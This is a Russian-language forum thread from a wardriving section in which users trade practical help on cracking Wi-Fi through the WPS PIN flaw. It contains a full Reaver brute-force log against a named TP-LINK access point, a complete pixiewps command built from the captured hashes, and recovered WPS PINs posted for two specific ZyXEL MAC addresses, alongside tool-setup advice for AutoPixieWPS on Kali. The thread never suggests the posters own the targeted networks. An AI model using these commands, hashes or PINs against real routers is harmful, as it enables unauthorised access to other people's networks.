Уязвимость в протоколе Wi-Fi Protected Setup

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by gpuhash, 30 Dec 2011.

  1. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    83
    Reputations:
    0
    ну вот,вот какие хешы выбирать?
    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

    [+] Switching mon0 to channel 6
    [+] Waiting for beacon from A0:F3:C1:44:A7:4A
    [+] Associated with A0:F3:C1:44:A7:4A (ESSID: Piramida)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: f7:87:9b:b3:a9:8b:2a:0d:2d:99:b4:e4:ca:77:72:d5
    [P] PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f:97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76:9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e:bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35:db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4:8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:bd:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3:1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa:42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:db:2a:12:49:c3:6a:fe:e2:f7
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [+] Received M1 message
    [P] AuthKey: 40:11:dd:34:20:c1:a8:4e:95:5c:f9:18:e8:46:03:dd:96:30:5f:55:8c:e2:c3:c8:23:a0:07:ea:09:42:56:b0
    [+] Sending M2 message
    [P] E-Hash1: 44:5e:8a:80:54:d2:5f:c9:4d:c9:4d:c2:16:35:2a:9a:34:c1:94:3e:94:4e:a2:aa:2a:af:ba:11:b8:d5:a6:5e
    [P] E-Hash2: 7f:c7:a5:23:8a:9e:c0:ba:70:14:49:97:63:27:36:58:65:2e:99:43:44:d1:c6:86:b6:01:aa:66:57:78:44:7e
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 1
    [+] Pin count advanced: 1. Max pin attempts: 11000
    C[+] Trying pin 00005678.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: da:35:7b:33:f5:1d:57:82:38:19:42:24:b6:1b:26:5b
    [P] PKE: 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87:63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47:93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a:3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de:19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44:c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:85:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2:b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7:ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4a:c9:aa:d8:ff:0b:59:04:2f
    [P] WPS Manufacturer: TP-LINK
    [P] WPS Model Number: 4.0
    [+] Received M1 message
    [P] AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74:14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba
    [+] Sending M2 message
    C[P] E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78:33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c
    [P] E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63:20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p1_index set to 2
    [+] Pin count advanced: 2. Max pin attempts: 11000
    ^C
    [+] Session saved.
     
  2. unkwn

    unkwn Member

    Joined:
    23 Apr 2012
    Messages:
    4
    Likes Received:
    11
    Reputations:
    0
    PKE: 75:6e:e5:08:f0:a5:a5:29:be:57:6b:c3:96:4c:8f:96:0f:97:c9:0c:76:19:8d:f0:92:44:52:30:b8:e5:1d:0e:30:2b:eb:42:28:5f:85:74:64:36:25:c5:02:12:13:a5:91:76:9f:ce:54:ea:0a:e2:24:2a:f1:81:89:6d:ed:a3:c1:a7:7e:bc:ae:92:48:79:1e:7f:99:c9:50:77:89:92:65:04:f9:1a:c3:9d:6d:42:9f:65:2b:2e:13:04:a9:83:0d:0f:a2:35:db:34:c4:81:74:3d:9c:5b:06:c4:bf:73:ee:9b:c7:5a:f4:8a:4d:6b:bd:c9:50:91:0f:61:56:53:1a:ad:59:c5:30:bd:19:b6:6f:ba:1a:22:ef:20:db:08:fc:5b:1c:5e:e4:d3:1f:c5:84:54:87:07:ed:c1:84:74:ae:31:dd:cd:35:64:aa:42:43:c7:61:79:8b:bb:c8:3b:50:3f:d9:08:86:d2:95:db:2a:12:49:c3:6a:fe:e2:f7

    E-Hash1: 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78:33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c
    E-Hash2: 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63:20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55

    AuthKey: 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74:14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba

    все , что тебе нужно
     
  3. unkwn

    unkwn Member

    Joined:
    23 Apr 2012
    Messages:
    4
    Likes Received:
    11
    Reputations:
    0
    и я тебя огорчу. данный TP-LINK не ломается. я только что прогнал этот pixiewps по твоим данным...

    pixiewps -e 44:4c:72:cb:2e:10:6a:5b:6a:4b:d4:5a:d9:24:2e:19:87:63:d5:6a:8a:ae:56:66:52:45:79:22:85:65:27:5b:88:4f:1b:7a:5e:7f:06:a8:23:a6:57:eb:f7:47:96:b2:8d:47:93:1b:17:a2:8e:df:8e:d5:42:41:69:78:9a:b6:90:0e:3a:3f:74:2a:ed:d3:e7:36:05:22:75:0d:c2:75:ef:e9:f9:3e:d9:0f:6c:67:90:00:f6:6a:cb:27:a9:75:c7:9d:e0:de:19:23:b3:ff:5d:78:ed:21:fd:e1:7e:52:de:00:76:65:44:c8:d8:0b:54:98:09:25:30:77:9c:cf:f1:43:df:19:83:85:ff:77:83:4f:fe:e5:a3:7b:ef:e1:7f:74:56:46:93:e2:b9:de:68:59:3b:46:11:b7:b0:b4:05:0d:08:07:a9:93:d7:ee:46:73:fc:dd:0e:33:c5:c0:27:55:88:8f:89:ad:26:4a:c9:aa:d8:ff:0b:59:04:2f -s 99:27:43:d0:9f:97:f8:f0:e1:da:d1:1f:47:11:c4:96:78:33:ae:7a:2e:13:19:9f:5b:eb:94:2f:87:27:0a:2c -z 98:e5:4e:48:d7:03:f0:ca:98:a3:f1:9a:38:b7:8f:68:63:20:2a:9a:84:b6:dd:32:51:56:d2:14:9b:33:fd:55 -a 6c:05:6f:5e:c7:dc:74:94:b7:4e:b0:52:92:7d:93:cb:74:14:c6:55:bd:6c:05:dc:b4:71:91:7e:c2:aa:93:ba -S
     
  4. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    83
    Reputations:
    0
    так а хешы какие выбирать,они ж разные......после первого пина одни данные,после другого пина другие данные и тд......так какие хешы то подставлять?
     
  5. ivann

    ivann Member

    Joined:
    9 Mar 2014
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    -bI-, та вот блин не пойму, я запускаю airmon-ng
     
  6. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Причём здесь airmon-ng. Человек спрашивает о другом. Согласно видео данные брались с первого перебора, но кто-то выше написал, что ждал несколько переборов и в одном из них удалось поймать пин. Значит он запускал pixiewps для каждого перебора по очереди. Я так понял.
     
  7. ivann

    ivann Member

    Joined:
    9 Mar 2014
    Messages:
    27
    Likes Received:
    5
    Reputations:
    0
    vedemur, к чему Ваш пост ?, airmon-ng адресован другому.
    p.s. читайте внимательней.
     
  8. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Извиняюсь, не обратил внимание, что есть такой пользователь под именем -bI-. А то, что написал в посте 2446 касается СЕРЖ32.
     
  9. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Я никак не пойму когда пишется sudo, а когда нет, объясните п.ж. И ещё, есть интересное здесь http://matthewhknight.com/autopixiewps/
     
    TOX1C, Payer and binarymaster like this.
  10. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    libssl-dev устанавливается в Kali Linux версии ниже 1,1,0, а начиная с версии 1,1,0 и выше не надо-уже учтено.
     
  11. binarymaster

    binarymaster Elder - Старейшина

    Joined:
    11 Dec 2010
    Messages:
    4,551
    Likes Received:
    9,572
    Reputations:
    119
    Зависит от случая. Sudo используется для выполнения команд под root (читай с правами администратора). Если вы уже зашли в систему под пользователем root, использование sudo не обязательно.
     
    quite gray likes this.
  12. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    358
    Likes Received:
    152
    Reputations:
    17
    Кто-нибудь знает пин код от роутера ZyXEL NBG460N-EE? Думал что алгоритм как у кинетиков, а оказалось нет. Лока WPS вроде нет, но что-то я не привык тратить 10 часов на взлом зухеля :)
     
  13. Payer

    Payer Elder - Старейшина

    Joined:
    14 May 2010
    Messages:
    1,004
    Likes Received:
    4,398
    Reputations:
    51
    Один только есть
    40:4A:03:8D:4D:30
    46883346
    и еще нашелся
    40:4A:03:8D:51:0C
    22648808
     
    gonny likes this.
  14. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    83
    Reputations:
    0
    что то тема не развивается по pixiewps,видимо не эффективная прога,или для малого количества точек....Кому ещё удавалось пин вытащить?какие это точки были(бренды).
     
  15. TOX1C

    TOX1C Elder - Старейшина

    Joined:
    24 Mar 2012
    Messages:
    1,028
    Likes Received:
    1,780
    Reputations:
    20
    была бы эта софтина под винду, а ещё лучше автоматизированный гуй с функцией авторматического парсинга хешей из cap файла, я попробовал бы её работу на разных точках. просто нет никакого желания ставить линукс ради одного скрипта.
     
  16. ak_45

    ak_45 Banned

    Joined:
    16 Dec 2011
    Messages:
    82
    Likes Received:
    7
    Reputations:
    0
    пха...а зачем линукс ставить? с виртуалки запускай...
    кстати вышел автоскрипт AutoPixieWPS.
     
  17. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Что PixieWPS, что AutoPixieWPS-результат одинаковый- pin not found. Использую Kali Linux с флешки.
     
  18. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    83
    Reputations:
    0
    кто уже тестил
    AutoPixieWps?не понял,как его запускать,вроде команды уже другие какие то,не так запускается,как PixieWps,подскажите...
     
  19. vedemur

    vedemur Member

    Joined:
    12 Nov 2012
    Messages:
    105
    Likes Received:
    9
    Reputations:
    0
    Всё то-же, только надо доустановить скрипт AutoPixieWps и далее по видео.
     
  20. СЕРЖ32

    СЕРЖ32 Member

    Joined:
    1 Sep 2013
    Messages:
    1,702
    Likes Received:
    83
    Reputations:
    0
    Хм.....что то не получается:как доустановить скрипт AutoPixieWps?ну скачал скрипт,как его доустановить?и как потом вообще запускать AutoPixieWps?видео по нему нет,не видел...как запускать просто PixieWps понятно,а как именно AutoPixieWps?
     
Loading...